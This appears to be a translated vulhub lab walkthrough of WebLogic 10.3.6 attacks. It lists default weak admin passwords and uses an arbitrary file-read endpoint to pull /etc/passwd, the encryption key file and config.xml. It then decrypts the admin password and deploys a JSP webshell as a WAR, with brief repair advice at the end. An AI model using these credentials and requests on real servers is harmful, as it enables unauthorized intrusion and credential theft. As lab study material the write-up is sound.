Weblogic (weak_password) vulnerability reappears
Preface
weblogic
is a Java application server used to develop, integrate, deploy and manage large-scale distributed web applications, network applications and database applications. This article mainly introduces several common weblogic
vulnerability principles and Reproduction process.
1. The leakage principle
After the weblogic was set up, the password to enter the background was not changed, resulting in a weak password login and obtaining the webshell.
-
This environment simulates a real weblogic environment, with a weak password in the background and an arbitrary file reading vulnerability in the frontend. Through these two vulnerabilities, the penetration of weblogic scenarios is simulated.
-
Weblogic version: 10.3.6(11g)
Java version: 1.6
2.Environment setup
Launch at vulhub rangedocker-compose up -d
Visit: http://your-ip:7001/console
to enter the backend
3. Reproduction process
1. Login with weak password
Enter a weak password: you can log in
-
weblogic
-
Oracle@123
Summary of common weak passwords in weblogic:
system:password weblogic:weblogic admin:secruity
joe:password mary:password system:sercurity
wlcsystem: wlcsystem weblogic:Oracle@123
2. Read any file
Assuming that there are no weak passwords, how to penetrate weblogic?
This environment simulates an arbitrary file download vulnerability in the frontend. Accessinghttp://your-ip:7001/hello/file.jsp?path=/etc/passwd
shows that the passwd file is successfully read. So, how to exploit this vulnerability?
-
The weblogic password is encrypted using AES (the old version 3DES), and the symmetric encryption can be decrypted. You only need to find the user's ciphertext and the encryption key;
Both files are located under base_domain and are named SerializedSystemIni.dat and config.xml;
-
SerializedSystemIni.dat is a binary file, so it must be read with burpsuite. Direct downloading with a browser may introduce some interfering characters. Select the string of garbled characters read in burp. This is the key. Right-click copy to file to save it as a file:
So visit: brup packet capture
192.168.241.129:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
- Then grab the config.xml package and find the encrypted administrator password:
192.168.241.129:7001/hello/file.jsp?path=config/config.xml
config.xml
is the global configuration file of base_domain, so there is a lot of messy content. Find the value of <node-manager-password-encrypted>
, which is the encrypted administrator password. Don’t find the wrong one: a>
Then decrypt, tool address:
https://github.com/TideSec/Decrypt_Weblogic_Password
Then log in and upload the shell,
Click Deploy first, then install
Click to upload file
Use this command to generate a war file and upload it
jar -cvf shell.war “x.jsp” //x.jsp为jsp一句话木马
Keep going to the next step until complete
Access at this time (the war file will be decompressed after deployment. At this time, directly access the file path and add a jsp sentence)
192.168.241.129:7001/shell/x.jsp
The above interface appears, indicating that the upload is successful. Use Ant Sword to connect.
4. Defense and Repair
1. Set up the Config.do page to log in and authorize access;
2. IPS and other defense products can add corresponding features;
3. Upgrade Go to the latest official version